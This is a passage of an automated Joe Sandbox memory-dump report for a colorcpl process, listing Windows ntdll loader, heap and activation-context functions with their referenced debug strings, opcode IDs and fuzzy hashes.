                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                          • Opcode ID: d3dd68ba68c82d4fce431c823de75b843b465f14da47c916c5a42b939381d55f
                                                                                                                                          • Instruction ID: f1463162157e7a509602a0323f76ece1d5ce7a3a9c2dbded1dddb011135edde5
                                                                                                                                          • Opcode Fuzzy Hash: d3dd68ba68c82d4fce431c823de75b843b465f14da47c916c5a42b939381d55f
                                                                                                                                          • Instruction Fuzzy Hash: 0FC1AA7010C782CFE711CF19C644B6AB7E4FF94708F404A6AFA959B251E778CA49CB52
                                                                                                                                          Function 22758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • LdrpInitializeProcess, xrefs: 22758422
                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2275855E
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 22758421
                                                                                                                                          • @, xrefs: 22758591
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                          • Opcode ID: e33032d69adea94ceb8341951cdf92584a5c05cdb38b35476572ec62afcf4c6b
                                                                                                                                          • Instruction ID: 54720eca383dd687ca5c9b4e8bcf37d8f8f17a853b8515191e27ba0f387d91f5
                                                                                                                                          • Opcode Fuzzy Hash: e33032d69adea94ceb8341951cdf92584a5c05cdb38b35476572ec62afcf4c6b
                                                                                                                                          • Instruction Fuzzy Hash: 5A919C7154C351AFD722CF20C884F6BBBE8EB94784F80092EFA8496151E734DA54CB62
                                                                                                                                          Function 2275273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 227922B6
                                                                                                                                          • .Local, xrefs: 227528D8
                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 227921D9, 227922B1
                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 227921DE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                          • Opcode ID: 2b15d301669364cf7aeace2cb702dcdd9fa7f12ed8122faeb6a3c3e0b56277f4
                                                                                                                                          • Instruction ID: 09d035202d827b42c48c32b7254f685722da7f294cc8df459a8ce60ccecbb384
                                                                                                                                          • Opcode Fuzzy Hash: 2b15d301669364cf7aeace2cb702dcdd9fa7f12ed8122faeb6a3c3e0b56277f4
                                                                                                                                          • Instruction Fuzzy Hash: BAA18E359093299BCB25CF64D988B99B3B1BF68318F2101E9DD08BB351D7B09E91CF90
                                                                                                                                          Function 22754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 22793425, 22793432, 22793451
                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 22793456
                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2279342A
                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 22793437
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                          • API String ID: 0-1245972979
                                                                                                                                          • Opcode ID: 6cc92b114a1d939f88b9e55c1ff999698b4f34b4484f22d3e38489c847b73792
                                                                                                                                          • Instruction ID: 68d34d110024418add2fb362fde32db14ca5e3c6adf3a06a4e2a0bc8735ad2a3
                                                                                                                                          • Opcode Fuzzy Hash: 6cc92b114a1d939f88b9e55c1ff999698b4f34b4484f22d3e38489c847b73792
                                                                                                                                          • Instruction Fuzzy Hash: FD61233260DB119BC312CF18C995F2AF3E1EF81B54F518629ED94AF291DB30E911CBA1
                                                                                                                                          Function 227264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22781028
                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 227810AE
                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22780FE5
                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2278106B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                          • Opcode ID: d8fe8cd9b17287c2b329544aa218d66e54128af2f481e5bdb14f58bbddc76824
                                                                                                                                          • Instruction ID: 1386447d3f75cf731c881020c6c3fb450b0efb0b8f3591e26dd78e2521d178ec
                                                                                                                                          • Opcode Fuzzy Hash: d8fe8cd9b17287c2b329544aa218d66e54128af2f481e5bdb14f58bbddc76824
                                                                                                                                          • Instruction Fuzzy Hash: 6471EEB190C3159FC711CF15C988F9B7BA8AF54764F400669FA488B28AD734DA88CBD2
                                                                                                                                          Function 2274245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • LdrpDynamicShimModule, xrefs: 2278A998
                                                                                                                                          • TGo", xrefs: 22742462
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2278A9A2
                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2278A992
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGo"$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1024064696
                                                                                                                                          • Opcode ID: 1d3dc9bb798bf64dfa5253241b6814715433c53ad402cb2210613592375b9ad0
                                                                                                                                          • Instruction ID: 60594e33f8b1cbfc2c9cfa066584878cae5b894d8978ac451bbd54a83db0a07c
                                                                                                                                          • Opcode Fuzzy Hash: 1d3dc9bb798bf64dfa5253241b6814715433c53ad402cb2210613592375b9ad0
                                                                                                                                          • Instruction Fuzzy Hash: 8E316B32A48311EBDB11CF58C984F6A7BB4FB84704F520559ED016B2C9CBBCD981DB81
                                                                                                                                          Function 227329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • HEAP[%wZ]: , xrefs: 22733255
                                                                                                                                          • HEAP: , xrefs: 22733264
                                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2273327D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                          • API String ID: 0-617086771
                                                                                                                                          • Opcode ID: 600fe5c7991e26c32b11b3e2162ee3ec0dbd9b8d658a7bc41bbe82b93578ed2b
                                                                                                                                          • Instruction ID: 96f8e98159cbcaf8745e9429136c882861bf7f5b83d72df09d69483d786ebfce
                                                                                                                                          • Opcode Fuzzy Hash: 600fe5c7991e26c32b11b3e2162ee3ec0dbd9b8d658a7bc41bbe82b93578ed2b
                                                                                                                                          • Instruction Fuzzy Hash: 6E92BB71A08389DFDB26CF68C540BAEBBF1FF58304F148159E859AB292D774A941CF90
                                                                                                                                          Function 22730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                          • Opcode ID: 2f3ca38e6d6cc2b9e22bd0740bb63bd8fdf4041321b75d498121d11cb47228ad
                                                                                                                                          • Instruction ID: c57c752e4563d140356374e0990c30a14c336679f6f3a7e988e50cd740ead18e
                                                                                                                                          • Opcode Fuzzy Hash: 2f3ca38e6d6cc2b9e22bd0740bb63bd8fdf4041321b75d498121d11cb47228ad
                                                                                                                                          • Instruction Fuzzy Hash: 6DF18C70A08705DFDB16CF68C994F6AB7B6FF44704F1042A8E5169B392D734EA81CB92
                                                                                                                                          Function 22746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $@
                                                                                                                                          • API String ID: 0-1077428164
                                                                                                                                          • Opcode ID: bee9fcd1e12b2b3d4c69381a6a1399b29abde04ce55ebc9531c12accd4b12d19
                                                                                                                                          • Instruction ID: e6d31b4edf3a2e88d12040ceed3ad99e5bc05f1797b4f6e46e8894332326b312
                                                                                                                                          • Opcode Fuzzy Hash: bee9fcd1e12b2b3d4c69381a6a1399b29abde04ce55ebc9531c12accd4b12d19
                                                                                                                                          • Instruction Fuzzy Hash: ADC29C71A0D3819FD725CF24C981BABBBF5AF88744F448A2DE998D7241DB34D904CB92
                                                                                                                                          Function 2271A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                          • Opcode ID: 6af4b7885a267da1dc3ba3185b956a0ba4a5a05ef3bc8021910d6377b9244de9
                                                                                                                                          • Instruction ID: 9671239bf07c1ec40ddf79ba45503a74ecfaad286c650824abecd19d47e3bbee
                                                                                                                                          • Opcode Fuzzy Hash: 6af4b7885a267da1dc3ba3185b956a0ba4a5a05ef3bc8021910d6377b9244de9
                                                                                                                                          • Instruction Fuzzy Hash: 4EA16E719053299BDF21DF64CD88BEAB7B8EF48704F1001EAEA09A7250D7359E84CF55
                                                                                                                                          Function 22740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • LdrpCheckModule, xrefs: 2278A117
                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 2278A10F
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 2278A121
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-161242083
                                                                                                                                          • Opcode ID: 4c33a80c553045c30415473b3e8c19e3c8c55d79c0913f0ec8aff08aba9e94f0
                                                                                                                                          • Instruction ID: f68a7ce79f641e9a44229f5ba1fca622cf6dd33df1c6959be48ea5982be14389
                                                                                                                                          • Opcode Fuzzy Hash: 4c33a80c553045c30415473b3e8c19e3c8c55d79c0913f0ec8aff08aba9e94f0
                                                                                                                                          • Instruction Fuzzy Hash: CC71EE70E08305DFDB09CF68CA84BAEB7F4FB48304F144469D842EB295EB38AA45CB51
                                                                                                                                          Function 22730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-1334570610
                                                                                                                                          • Opcode ID: 9b48a18498f2414f6396d7d8315f8bc0a654454db88b62fb41ffe3fc33654c0b
                                                                                                                                          • Instruction ID: a9d9bed2096228f081204ed7f4cc63c92d3c7d2228436c52e050ee58f29fe6ac
                                                                                                                                          • Opcode Fuzzy Hash: 9b48a18498f2414f6396d7d8315f8bc0a654454db88b62fb41ffe3fc33654c0b
                                                                                                                                          • Instruction Fuzzy Hash: A161F370A08301DFD71ACF28C984B9ABBE1FF45308F158559E8899F297D770E981CB95
                                                                                                                                          Function 2275C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 227982DE
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 227982E8
                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 227982D7
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1783798831
                                                                                                                                          • Opcode ID: 2caa493dd92eabed3f77e1076d21a10861cf99a7050717c3c518364f667d876f
                                                                                                                                          • Instruction ID: f8b148fbf2f7e2ed7bc8d0a598095ede7a6fc436cd65ccfb9e6d55c04825b114
                                                                                                                                          • Opcode Fuzzy Hash: 2caa493dd92eabed3f77e1076d21a10861cf99a7050717c3c518364f667d876f
                                                                                                                                          • Instruction Fuzzy Hash: FE41FD72549311ABC722DB24C988B5BB7E8EF58750F000D2AFD99D72D5EB78D800CB91
                                                                                                                                          Function 227DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • @, xrefs: 227DC1F1
                                                                                                                                          • PreferredUILanguages, xrefs: 227DC212
                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 227DC1C5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                          • Opcode ID: ad4f67227edbb25b3fc846996a0e4c34c0596aefdee2d4fb36756c94b8879969
                                                                                                                                          • Instruction ID: a771706e15e456a53cbfe3131cf48fbcbf20175ae80d887228555bed37d2d6da
                                                                                                                                          • Opcode Fuzzy Hash: ad4f67227edbb25b3fc846996a0e4c34c0596aefdee2d4fb36756c94b8879969
                                                                                                                                          • Instruction Fuzzy Hash: B2417372E04309EBDB01CBD4C994FEFBBB9AB18B04F10416AEA05B7244D774AA44CB50
                                                                                                                                          Function 227B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                          • API String ID: 0-1373925480
                                                                                                                                          • Opcode ID: 09de07f9d8a34d00ee2d517e5634337df7d4f070342cbeda8678256acf672e40
                                                                                                                                          • Instruction ID: 476384729d30eabc3f53bc3b5852da60ba0aa6f25ed1e88afbd516d732326be7
                                                                                                                                          • Opcode Fuzzy Hash: 09de07f9d8a34d00ee2d517e5634337df7d4f070342cbeda8678256acf672e40
                                                                                                                                          • Instruction Fuzzy Hash: 1341D332D097588BEB22CBA5C964BEEB7B9EFA5344F100569D900FF791DB348901CB51
                                                                                                                                          Function 227A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 227A4888
                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 227A4899
                                                                                                                                          • LdrpCheckRedirection, xrefs: 227A488F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                          • API String ID: 0-3154609507
                                                                                                                                          • Opcode ID: 74002a63912003e166372ec4c101f4bf37c184662c4a218796b3854f3a8dab54
                                                                                                                                          • Instruction ID: c4b7bc5366ceaa7ce68fe5313cec6f55f1c355853fa6e9e012cd351303e96775
                                                                                                                                          • Opcode Fuzzy Hash: 74002a63912003e166372ec4c101f4bf37c184662c4a218796b3854f3a8dab54
                                                                                                                                          • Instruction Fuzzy Hash: AA41C132A093919FCB12CF68DA71E167BE5AF49660F010779ED89A7255D732D800CB91
                                                                                                                                          Function 2272A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 2272A309
                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 2272A2FB
                                                                                                                                          • PSo", xrefs: 2272A348
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PSo"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                          • API String ID: 0-2379348149
                                                                                                                                          • Opcode ID: f79e81a2672580efbbd2a5f070a2199d25e0b0da8e62f7ee78f625f44ef2c6c3
                                                                                                                                          • Instruction ID: f720d4d9bd57de263081efc0c85d6dc6a6b188fed9bed019a7c848694be427cf
                                                                                                                                          • Opcode Fuzzy Hash: f79e81a2672580efbbd2a5f070a2199d25e0b0da8e62f7ee78f625f44ef2c6c3
                                                                                                                                          • Instruction Fuzzy Hash: 3141D031A09B89DBEB12CF69C640F597BB4FF94704F2042A9E900EB252E379CE00CB51
                                                                                                                                          Function 22730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-2558761708
                                                                                                                                          • Opcode ID: 0479fccabe3c3bf72883ca7d31819215eb06e1f97cec474852286c839db86db5
                                                                                                                                          • Instruction ID: ebcca9d5babc73caed61e8cf019624386df96fc13988514e6b041d839b957087
                                                                                                                                          • Opcode Fuzzy Hash: 0479fccabe3c3bf72883ca7d31819215eb06e1f97cec474852286c839db86db5
                                                                                                                                          • Instruction Fuzzy Hash: 6511263131D301DFD71ACB14C884F9AB3A6EF4071AF158269E40AEB296EB34DC41C752
                                                                                                                                          Function 227A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • LdrpInitializationFailure, xrefs: 227A20FA
                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 227A20F3
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 227A2104
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                          • Opcode ID: 916dea2dd3de4a6e3eb5d325bfe476c7f5607e28e016046e3f55b318878fb4dc
                                                                                                                                          • Instruction ID: 6c8b62dc5ff81a68dcfe0610c5172a3161368474a81a074c9fac1af1bc25fc01
                                                                                                                                          • Opcode Fuzzy Hash: 916dea2dd3de4a6e3eb5d325bfe476c7f5607e28e016046e3f55b318878fb4dc
                                                                                                                                          • Instruction Fuzzy Hash: B0F04632644308BBEB10DB0CCD96FA937A8EB51B68F200429FB047B2C5D6F0EA04C680
                                                                                                                                          Function 227303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                          • String ID: #%u
                                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                                          • Opcode ID: 35057b13c356529a4d692937adde65f9f9ee1275bf31cd51981a858eab2a9222
                                                                                                                                          • Instruction ID: f5c1ddb290b56f5cc31bae7c6c0052def046369e97fe91e66b9ec5b826bf0fee
                                                                                                                                          • Opcode Fuzzy Hash: 35057b13c356529a4d692937adde65f9f9ee1275bf31cd51981a858eab2a9222
                                                                                                                                          • Instruction Fuzzy Hash: DF715D71A043499FDB02CFA9C994FAEB7F8AF58704F144165E904EB251EA74EE01CBA1
                                                                                                                                          Function 2272A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • LdrResSearchResource Enter, xrefs: 2272AA13
                                                                                                                                          • LdrResSearchResource Exit, xrefs: 2272AA25
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                          • Opcode ID: 638239a7c7f2bb3346ab40ec9ba727512848ea1fed7c6e95ef1778e66056b9a6
                                                                                                                                          • Instruction ID: 6daeb4e75b5554cb6b09627432b47052e74915acce8364d019c88962fd8b2ff6
                                                                                                                                          • Opcode Fuzzy Hash: 638239a7c7f2bb3346ab40ec9ba727512848ea1fed7c6e95ef1778e66056b9a6
                                                                                                                                          • Instruction Fuzzy Hash: 74E18171E08B59AFEB11CF99CA80B9EB7BAFF15354F100226E900EB251D778D940DB51
                                                                                                                                          Function 227EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: `$`
                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                          • Instruction ID: ad65c3796c28e9955cecaca41d7d8b9b57d8ed5bb98579160bb9025d4c764e9a
